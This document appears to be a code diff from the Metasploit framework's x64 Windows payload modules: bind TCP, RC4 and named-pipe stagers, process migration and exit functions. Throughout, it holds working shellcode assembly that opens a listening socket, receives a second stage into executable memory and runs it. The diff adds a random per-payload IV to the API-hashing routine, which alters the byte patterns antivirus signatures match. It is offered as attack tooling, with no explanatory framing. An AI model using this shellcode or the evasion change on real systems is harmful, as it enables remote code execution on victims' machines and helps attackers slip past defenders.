mov r10d, #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
call rbp ; GetModuleHandleA("kernel32")
call get_exit_name
@@ -341,7 +341,7 @@ module Payload::Windows::BindNamedPipe_x64
get_exit_name:
mov rcx, rax ; hModule
pop rdx ; lpProcName
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
mov r10d, #{block_api_hash('kernel32.dll', 'GetProcAddress')}
call rbp ; GetProcAddress(hModule, "ExitThread")
xor rcx, rcx ; dwExitCode
call rax ; ExitProcess(0)
@@ -71,7 +71,7 @@ module Payload::Windows::BindTcpRc4_x64
push 4 ;
pop r8 ; length = sizeof( DWORD );
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, &dwLength, 4, 0 );
add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next
@@ -86,7 +86,7 @@ module Payload::Windows::BindTcpRc4_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx,rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; mov rbx, rax ; rbx = our new memory address for the new stage
@@ -102,7 +102,7 @@ module Payload::Windows::BindTcpRc4_x64
mov r8, rsi ; length
mov rdx, rbx ; the current address into our second stages RWX buffer
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, buffer, length, 0 );
add rsp, 32 ; restore stack after api_call
@@ -143,14 +143,14 @@ module Payload::Windows::BindTcp_x64
; perform the call to LoadLibraryA...
mov rcx, r14 ; set the param for the library to load
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA( "ws2_32" )
; perform the call to WSAStartup...
mov rdx, r13 ; second param is a pointer to this struct
push 0x0101 ;
pop rcx ; set the param for the version requested
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call rbp ; WSAStartup( 0x0101, &WSAData );
; perform the call to WSASocketA...
@@ -162,7 +162,7 @@ module Payload::Windows::BindTcp_x64
xor r8, r8 ; we do not specify a protocol
inc rax ;
mov rdx, rax ; push SOCK_STREAM
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call rbp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
mov rdi, rax ; save the socket for later
@@ -172,26 +172,26 @@ module Payload::Windows::BindTcp_x64
; first 8 bytes as the rest aren't used)
mov rdx, r12 ; set the pointer to sockaddr_in struct
mov rcx, rdi ; socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
mov r10d, #{block_api_hash('ws2_32.dll', 'bind')}
call rbp ; bind( s, &sockaddr_in, #{sockaddr_size} );
; perform the call to listen...
xor rdx, rdx ; backlog
mov rcx, rdi ; socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
mov r10d, #{block_api_hash('ws2_32.dll', 'listen')}
call rbp ; listen( s, 0 );
; perform the call to accept...
xor r8, r8 ; we set length for the sockaddr struct to zero
xor rdx, rdx ; we dont set the optional sockaddr param
mov rcx, rdi ; listening socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
mov r10d, #{block_api_hash('ws2_32.dll', 'accept')}
call rbp ; accept( s, 0, 0 );
; perform the call to closesocket...
mov rcx, rdi ; the listening socket to close
mov rdi, rax ; swap the new connected socket over the listening socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
call rbp ; closesocket( s );
; restore RSP so we dont have any alignment issues with the next block...
@@ -213,7 +213,7 @@ module Payload::Windows::BindTcp_x64
push 4 ;
pop r8 ; length = sizeof( DWORD );
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, &dwLength, 4, 0 );
add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next
@@ -226,7 +226,7 @@ module Payload::Windows::BindTcp_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
@@ -238,7 +238,7 @@ module Payload::Windows::BindTcp_x64
mov r8, rsi ; length
mov rdx, rbx ; the current address into our second stages RWX buffer
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, buffer, length, 0 );
add rbx, rax ; buffer += bytes_received
@@ -10,12 +10,31 @@ module Msf
###
module Payload::Windows::BlockApi_x64
@block_api_iv = nil
def block_api_iv(opts={})
@block_api_iv ||= rand(0x100000000)
end
def asm_block_api(opts={})
Rex::Payloads::Shuffle.from_graphml_file(
asm = Rex::Payloads::Shuffle.from_graphml_file(
File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'),
arch: ARCH_X64,
name: 'api_call'
)
iv = opts.fetch(:block_api_iv) { block_api_iv }
# Patch the assembly to set the correct IV
# db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00 => mov r9d, <iv>
iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00")
raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
end
asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
end
def block_api_hash(mod, func, opts={})
iv = opts.fetch(:block_api_iv) { block_api_iv }
Rex::Text.block_api_hash(mod, func, iv: iv)
end
end
@@ -23,7 +23,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
mov r10d, ebx ; place the correct EXITFUNK into r10d
call rbp ; SetUnhandledExceptionFilter(0)
push 0 ;
@@ -34,7 +34,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
mov r10d, ebx ; place the correct EXITFUNK into r10d
call rbp ; call EXITFUNK( 0 );
^
@@ -43,7 +43,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
call rbp ; ExitProcess(0)
^
@@ -51,7 +51,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 300000 ; 300 seconds
pop rcx ; set the sleep function parameter
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
call rbp ; Sleep(30000)
jmp exitfunk ; repeat
^
@@ -31,7 +31,7 @@ module Payload::Windows::MigrateCommon_x64
#{generate_migrate(opts)}
signal_event:
mov rcx, qword [rsi] ; Event handle is pointed at by rsi
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
call rbp ; SetEvent(handle)
call_payload:
call qword [rsi+8] ; Invoke the associated payload
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe_x64
mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context.
signal_pipe_event:
mov rcx, qword [rsi] ; Event handle is pointed at by rsi
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
call rbp ; SetEvent(handle)
call_pipe_payload:
call qword [rsi+8] ; call the associated payload
@@ -38,13 +38,13 @@ module Payload::Windows::MigrateTcp_x64
sub rsp, #{WSA_SIZE} ; alloc size, plus alignment (used later)
mov r13, rsp ; save pointer to this struct
sub rsp, 0x28 ; space for api function calls (really?)
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA('ws2_32')
init_networking:
mov rdx, r13 ; pointer to the wsadata struct
push 2
pop rcx ; Version = 2
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call rbp ; WSAStartup(Version, &WSAData)
create_socket:
xor r8, r8 ; protocol not specified
@@ -55,7 +55,7 @@ module Payload::Windows::MigrateTcp_x64
pop rdx ; SOCK_STREAM
push 2
pop rcx ; AF_INET
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call rbp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
xchg rdi, rax
^

Some files were not shown because too many files have changed in this diff Show More